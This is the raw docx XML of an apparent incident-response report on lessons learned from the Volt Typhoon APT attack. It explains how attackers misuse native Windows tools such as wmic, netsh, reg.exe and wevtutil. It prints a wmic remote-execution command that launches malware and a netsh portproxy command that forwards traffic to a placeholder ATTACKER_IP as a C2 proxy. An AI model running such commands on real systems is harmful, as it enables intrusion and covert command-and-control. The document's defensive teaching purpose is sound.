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Lessons Learned from Volt Typhoon APT Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The investigation of the Volt Typhoon APT attack provided critical insights into how advanced attackers operate within a compromised environment. One of the most important lessons learned is that successful incident response depends heavily on understanding system internals, native tools, and logging mechanisms. Attackers often rely on legitimate system utilities, making detection significantly more challenging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. Unfamiliar Tools &amp; Their Purpose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>During the investigation, several native Windows tools and attack utilities were identified. Understanding these tools is essential for detecting similar attacks in the future.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9450" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:start w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:end w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1710"/>
        <w:gridCol w:w="3510"/>
        <w:gridCol w:w="4230"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:trHeight w:val="540" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Normal Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4230" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Attacker Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="568" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>wm ic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>system info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4230" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>remote execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="506" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>netsh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>network config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4230" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2 proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="624" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>reg.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>troubleshooting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4230" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>credential hunting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="642" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>wevtutil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>log viewing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4230" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>log clearing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1. WMI and WMIC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WMI - (Windows Management Instrumentation) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WMIC - (Windows Management Instrumentation Command-line)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WMI (Windows Management Instrumentation) is the built-in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"master control database"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of Windows. It allows administrators and software to query, configure, and control almost every aspect of a computer or network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Think:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WMI = engine (data + control)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WMIC / PowerShell = ways to use it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">How Attacker Miss use it: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WMI is a powerful system management tool—and attackers misuse it to run commands remotely, move across networks, and stay hidden.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remote execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Run commands on remote systems</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wmic /node:target process call create "cmd.exe /c malware.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lateral movement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Move between machines inside network </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Create WMI events to auto-run malware </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stealth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Uses trusted Windows service → hard to detect </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Information gathering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Collect system data (users, drives, processes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2. netsh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">(Network Shell) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Netsh (Network Shell) is a command-line utility that allows you to display or modify the network configuration of a computer currently running.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In technical terms, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>netsh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dynamic Configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This means it changes the settings of your network hardware and software while the computer is turned on and active, without requiring you to go into the BIOS or reinstall the system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How attackers misuse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>netsh:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Create proxy (C2 communication)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Redirect traffic to attacker server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="nextPage"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:left="1134" w:right="1134" w:gutter="0" w:header="0" w:top="1134" w:footer="0" w:bottom="1134"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:formProt w:val="false"/>
          <w:textDirection w:val="lrTb"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>netsh interface portproxy add v4tov4 listenport=8080 connectaddress=ATTACKER_IP connectport=443</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
